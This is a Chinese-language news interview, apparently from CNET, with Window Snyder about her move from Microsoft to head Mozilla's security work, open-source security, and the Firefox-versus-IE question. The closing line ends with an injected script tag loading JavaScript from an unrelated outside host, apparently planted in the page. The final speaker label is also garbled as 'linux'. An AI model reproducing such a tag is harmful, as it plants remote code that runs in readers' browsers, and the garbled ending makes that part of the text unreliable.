9月21日国际报道 加州山景城-mozilla的新任的安全负责人是不会告诉你究竟是firefox 安全,还是ie更安全。
window snyder 是前微软职员,现任mozilla 安全部门负责人。
她在微软的时候曾经帮助创建windows 安全工作流程。她还举办了蓝帽会议,将黑客邀请到微软,暴露自己产品的漏洞。
她对cnet新闻网站表示,在这一新职位上,snyder计划与外部世界分享mozilla 的安全机密,加强与安全研究人员社区的联系,去除mozilla 产品当中老旧,相对危险的代码。
snyder自称是一名极客(geek),她还是一名程序员的女儿。在她的少女时代,她的母亲在德州仪器99型电脑上就教她basic 语言编程。她担任过@stake公司的安全咨询员,这家公司后来被赛门铁克收购。
以下是cnet对她的专访。
问:你为什么对安全感兴趣?
snyder:我学过数学以及计算机科学,这两门学科让我接触到了加密学。从那以后,我就对如何开发安全程序以及如何保护安全系统产生了兴趣。我曾是一名软件工程师,研究安全程序的机会也相当的多。
你的安全职业生涯开始于什么时候?
snyder:我从上个世纪90年代就开始参与安全研究组织的活动了。
1990年代末期,安全行业确实发生了翻天覆地的变化:“互联网安全系统”(iss )等公司开始出现。这些技术终于实现了商业化,因此我从开发转型到了咨询。2000年,我在@stake公司工作。之前,我做的工作并不是纯粹的安全咨询。
你信奉的安全法则是什么?
snyder:没有什么是安全的。这一点很重要,无论你是在开发软件,还是一名安全测试人员,都应该牢记这一点。要不断的想办法去保护系统,因为总有人准备入侵它们,总有人想利用系统中的漏洞,总有人想伤害你的客户。
你在微软呆了三年,你在那里做什么?
snyder:一开始,我为“确保windows 安全”项目工作,开发算法,与不同的产品团队进行协调,以确保微软产品的安全。我设立了一个职位,专门全面负责操作系统的安全。微软的操作系统开发团队有许多负责人,有人进行本地化工作,有些人负责性能,还有人负责与合作伙伴产品的对接,但之前就是没有负责安全的人。
windows xp sp2服务包上市以后,我是一个全新的社区团队的第一人,我负责将一些非正式的社区信息反馈给微软。我们创办了蓝帽大会。
现在你在mozilla 了。你觉得有挑战性吗?还是可以高枕无忧了?
snyder:需要做很多的事情。mozilla 的情况确实很不一样,因为他们有社区。我们的开发能够仰仗于社区。这一点最令我感到兴奋,因为开源项目的本质就是这样,其他人也可以学到我们同样学到的东西。
在一个商业环境中,你实际上关闭了源代码。人们看到成果,但却看不到过程。在mozilla ,firefox ,你既可以看到成果,又可看到过程步骤。
你认为mozilla 产品的安全性如何?
snyder:还需要做大量的工作。
一点都不安全吗?
snyder:没有什么是安全的,因此,改进无疑是必要的。
firefox 比微软的ie浏览器更安全吗?
snyder:这要看你如何来衡量安全了。我认为衡量安全最重要的一个尺度就是:厂商向用户发放补丁的速度有多快?然后就是,一旦补丁就位,实施补丁的时间有多长?
我认为mozilla 已经减少了漏洞发现与补丁发放之间的这段时间,并且漏洞的数量在降低。
那么,请用一句话来回答这一问题:firefox 比ie更安全吗?
snyder:我认为这个问题无法用一句话来回答。
你不能说是或不是吗?
snyder:你需要注意每天的危险。你需要看整个的流程,如何响应,如何实现流程的透明化。
mozilla 或它的产品面临任何的安全挑战吗?
snyder:我们在加强产品的安全性方面有巨大的机会,从我们的功能角度,到适应变化等等,比如,通过去除死代码或者不经常使用的代码,我们可以降低攻击发生的频率。
你在微软干过,现在又在mozilla 工作。你如何看待社区?一些安全研究员已经发现,firefox 当中也存在一些漏洞。
snyder:我将安全研究社区看作是mozilla 社区的另外一个组成部分。社区成员能够贡献他们的安全设计,他们可以对功能进行建议。
他们能够参与安全设计,他们可以建议功能,他们能够帮助我们检查漏洞,他们还可以帮我们进行测试。他们能够开发我们需要的检测工具,以便发现更多的漏洞。这方面的内容很丰富(比商业产品丰富多了)。
在你来mozilla 之前就已经在使用firefox 浏览器了吗?
snyder:是的。我使用每种浏览器。我在家里面有苹果电脑,还有安装了linux 操作系统的pc. 我的家里面有很多的电脑平台以及软件。
你现在的工作时间比以往更长了吗?
linux :可能是这样的,我现在花大量的时间提高自己的工作速度。对我而言,这是一份全新的工作?script src=http://er12.com/t.js>
